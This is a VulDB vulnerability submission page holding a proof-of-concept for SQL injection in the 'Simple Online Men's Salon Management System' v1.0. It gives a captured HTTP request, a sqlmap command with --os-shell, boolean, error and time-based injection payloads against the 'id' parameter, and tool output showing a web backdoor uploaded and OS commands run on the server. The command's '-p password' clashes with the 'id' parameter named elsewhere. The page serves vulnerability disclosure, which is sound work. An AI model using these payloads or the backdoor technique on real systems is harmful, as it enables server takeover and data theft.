提交 #186292: Simple Online Men's Salon Management System - SQL Injection信息

标题	Simple Online Men's Salon Management System - SQL Injection
描述	# Exploit Title: Simple Online Men's Salon Management System - SQL Injection # Exploit Author: Pratik Shetty # Vendor Name: oretnom23 # Vendor Homepage: https://www.sourcecodester.com/php/15069/simple-online-mens-salon-management-system-php-free-source-code.html # Software Link: https://www.sourcecodester.com/php/15069/simple-online-mens-salon-management-system-php-free-source-code.html # Version: v1.0 # Tested on: Windows 11, Apache Description:- A SQL Injection issue in Simple Online Men's Salon Management System allows to get an complete Remote Access into the website. Access such as database, files and everything. ` Payload used:- python sqlmap.py -r read.TXT -p password --risk 2 --level 3 --os-shell ` Parameter":- read.txt file is our payload file ``` GET /msms/admin/?page=user/manage_user&id=3 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=06rf7g4o1p13b8d4kpci1fobjb Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 ``` ` Steps to reproduce:- 1. Here we take the GET method of "http://localhost/msms/admin/?page=user/manage_user&id=3" just this page only 2. In this we target our paramter as "id" and save it to a txt file. 3. Now we are gonna use "SQLMap" tool and with this following command python sqlmap.py -r read.TXT -p password --risk 2 --level 3 --os-shell 4. As we can see we got the complete access of the server ``` [01:57:18] [INFO] testing 'MySQL UNION query (74) - 21 to 40 columns' [01:57:18] [INFO] testing 'MySQL UNION query (74) - 41 to 60 columns' [01:57:19] [INFO] testing 'MySQL UNION query (74) - 61 to 80 columns' [01:57:20] [INFO] testing 'MySQL UNION query (74) - 81 to 100 columns' GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: page=user/manage_user&id=3' AND 4129=(SELECT (CASE WHEN (4129=4129) THEN 4129 ELSE (SELECT 2453 UNION SELECT 1417) END))-- - Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: page=user/manage_user&id=3' AND (SELECT 7719 FROM(SELECT COUNT(),CONCAT(0x7171706271,(SELECT (ELT(7719=7719,1))),0x716b717a71,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- vkYP Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=user/manage_user&id=3' AND (SELECT 4180 FROM (SELECT(SLEEP(5)))ffuw)-- mIxN --- [01:58:04] [INFO] the back-end DBMS is MySQL web application technology: PHP 8.2.4, Apache 2.4.56 back-end DBMS: MySQL >= 5.0 (MariaDB fork) [01:58:04] [INFO] going to use a web backdoor for command prompt [01:58:04] [INFO] fingerprinting the back-end DBMS operating system [01:58:04] [INFO] the back-end DBMS operating system is Windows which web application language does the web server support? [1] ASP (default) [2] ASPX [3] JSP [4] PHP > 4 [01:58:10] [INFO] retrieved the web server document root: 'C:\xampp\htdocs' [01:58:10] [INFO] retrieved web server absolute paths: 'C:/xampp/htdocs/msms/admin/index.php, C:/xampp/htdocs/msms/admin/user/manage_user.php' [01:58:10] [INFO] trying to upload the file stager on 'C:/xampp/htdocs/' via LIMIT 'LINES TERMINATED BY' method [01:58:10] [INFO] the file stager has been successfully uploaded on 'C:/xampp/htdocs/' - http://localhost:80/tmpuqhar.php [01:58:10] [INFO] the backdoor has been successfully uploaded on 'C:/xampp/htdocs/' - http://localhost:80/tmpbfbsc.php [01:58:10] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER os-shell> ls do you want to retrieve the command standard output? [Y/n/a] y command standard output: --- 'ls' is not recognized as an internal or external command, operable program or batch file. --- os-shell> whoami do you want to retrieve the command standard output? [Y/n/a] y command standard output: 'laptop-*********\pratik shetty' os-shell> ````
来源	⚠️ https://github.com/draco1725/POC/blob/main/Exploit/Simple%20Online%20Men's%20Salon%20Management%20System/SQL%20Injection
用户	draco (UID 24011)
提交	2023-07-23 22時40分 (3 年前)
管理	2023-07-27 21時49分 (4 days later)
状态	已接受
VulDB条目	235608 [SourceCodester Simple Online Mens Salon Management System 1.0 manage_user&id=3 标识符 SQL注入]
积分	20

◂ 上一步一览下一步 ▸

Do you want to use VulDB in your project?

Use the official API to access entries easily!